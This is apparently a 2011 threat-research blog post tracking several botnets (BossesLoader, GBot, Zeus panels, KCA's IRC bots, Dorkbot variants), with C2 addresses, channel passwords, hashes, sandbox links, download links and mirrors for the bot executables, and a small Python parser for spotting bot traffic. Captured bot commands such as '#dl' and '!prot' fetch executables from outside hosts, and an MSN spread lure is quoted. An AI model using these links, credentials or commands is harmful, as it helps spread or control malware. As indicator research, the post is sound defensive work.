Monday, September 12, 2011

BossesLoader + Gbot

(HTTP Side) BossesLoader:
http://3v.irc.su/CET/Panel/
http://3v.irc.su/CET/Panel/bot.php

Post data made from bot:
mode=1
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}

Bot responding to a command:
mode=2
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
version=0.2.0

Process the bot runs as (Win7/Vista):
C:\Users\\AppData\Local\wincsrss.exe


Now we get into the IRC side of this criminal's server.
(IRC Side) GBot:

Server: 94.23.252.85:4747 (channel: #Gbot)
Topic On: [ #Gbot ] [ !prot http://3v.irc.su/gbot.exe 1 ]
Topic By: [ Ted ]

Hosting Info:
http://whois.domaintools.com/94.23.252.85
(France Ovh Systems)

Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=76d385c04e71cd4808059eebeb459c12fa092c405fac226eb0743ad6f44885c7-1315872197

Analysis:
http://www.threatexpert.com/report.aspx?md5=ea78961231a757f5a592948df290d5d2
http://anubis.iseclab.org/?action=result&task_id=1de6c531e3e513e94ddb15212a0be92d8


Connects to IRC server: 94.23.252.85:4747
IRC Conversations:
NICK n{USA|XP}erafhjg
USER n{USA|XP}erafhjg 0 0 :n{USA|XP}erafhjg
JOIN #Gbot GTFO
PONG :7110E098
PRIVMSG #Gbot :[FileProt]: File protection has been enabled for C:\WINDOWS\system32\Dwdjqfihf.exe
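As an added example (not code from the original post), here is a small Python parser for the two bot-to-server exchanges quoted above: the HTTP check-in body (mode/UID) and the raw IRC lines. The sample IRC traffic below is constructed from the quoted lines, and the nick regex is my own assumption based on the n{COUNTRY|OS}random shape these bots use.

```python
import re
from urllib.parse import parse_qs

# Constructed sample modelled on the IRC lines quoted in the post (not a real capture).
SAMPLE_IRC = """NICK n{USA|XP}erafhjg
USER n{USA|XP}erafhjg 0 0 :n{USA|XP}erafhjg
JOIN #Gbot GTFO
PONG :7110E098
PRIVMSG #Gbot :[FileProt]: File protection has been enabled for C:\\WINDOWS\\system32\\Dwdjqfihf.exe
PRIVMSG #chat :hello everyone
"""

# Assumed nick shape: optional letter prefix, {COUNTRY|OS}, then a random suffix.
BOT_NICK_RE = re.compile(r"^[A-Za-z]?\{[A-Za-z]{2,3}\|[A-Za-z0-9]+\}[a-z0-9]{4,}$")
# Status-report prefix such as "[FileProt]:" or "[MSN]:" at the start of a channel message.
STATUS_RE = re.compile(r"^\[(\w+)\]:")


def parse_checkin(body):
    """Parse the bot's HTTP check-in body (mode=1&UID={...}) into a dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def parse_irc_lines(text):
    """Extract bot indicators from client-to-server IRC lines in a capture."""
    hits = {"bot_nick": None, "joins": [], "status_msgs": []}
    for line in text.splitlines():
        parts = line.split(" ", 2)
        cmd = parts[0].upper() if parts else ""
        if cmd == "NICK" and len(parts) > 1 and BOT_NICK_RE.match(parts[1]):
            hits["bot_nick"] = parts[1]
        elif cmd == "JOIN" and len(parts) > 1:
            # JOIN <channel> [key]: the key is the channel password the bot uses.
            key = parts[2].strip() if len(parts) > 2 else None
            hits["joins"].append((parts[1], key))
        elif cmd == "PRIVMSG" and len(parts) > 2:
            target, msg = parts[1], parts[2].lstrip(":")
            m = STATUS_RE.match(msg)
            if m:  # keep only bot status reports, not ordinary chat
                hits["status_msgs"].append((target, m.group(1), msg))
    return hits


def is_bot_session(hits):
    """A session is flagged if the nick matches the bot shape or it posts status reports."""
    return hits["bot_nick"] is not None or bool(hits["status_msgs"])
```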


Bot re-uploaded (for any further analysis):
http://www.mediafire.com/?utnq797aqbp69b2
http://www.multiupload.com/89FOAW25BF

Zeus hosted with Turkey Eskisehir National Academic Network And Information Center

http://193.255.81.157/cp.php

Hosting:
http://whois.domaintools.com/193.255.81.157
Hosted with: http://www.ulakbim.gov.tr/ (Possibly a hacked server)

Zeus hosted in Lithuania (Siauliai, Splius UAB)

http://charityforcancer.info/donate/help/therapy/funds/thanks/cp.php
Registrar: GoDaddy.com Inc. (R171-LRMS)
Ip: 77.79.9.208

Hosting:
http://www.aleja.lt/
http://whois.domaintools.com/77.79.9.208

Bot:
http://charityforcancer.info/donate/help/therapy/funds/thanks/bot.exe
http://www.mediafire.com/?t42w7wbnh09r7ku
http://www.multiupload.com/MQ3D3TYBE0

Analysis:
http://www.threatexpert.com/report.aspx?md5=8da8384d5602a83b26683bb931769d60
http://anubis.iseclab.org/?action=result&task_id=14d3ea94794834874e582da5b36a31e41

Config:
http://charityforcancer.info/donate/help/therapy/funds/thanks/config.bin
http://www.mediafire.com/?pq0ji6a6c9edaf7
http://www.multiupload.com/785DXO2WZ0

KCA's Botnet

BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net

Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN

Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe

RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe

DorkBot/NgrBot Variants:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe

Other bots used:
The IRC also uses Aryan bot; I was unable to acquire an .exe at the time of this analysis.

Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB

KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"



bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"



images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA



vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA



bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:

NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="



enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b

Some HF hackers' Autumn HTTP botnet

http://77.79.11.237/autumn/c.php

http://whois.domaintools.com/77.79.11.237
Hosted with: http://www.aleja.lt/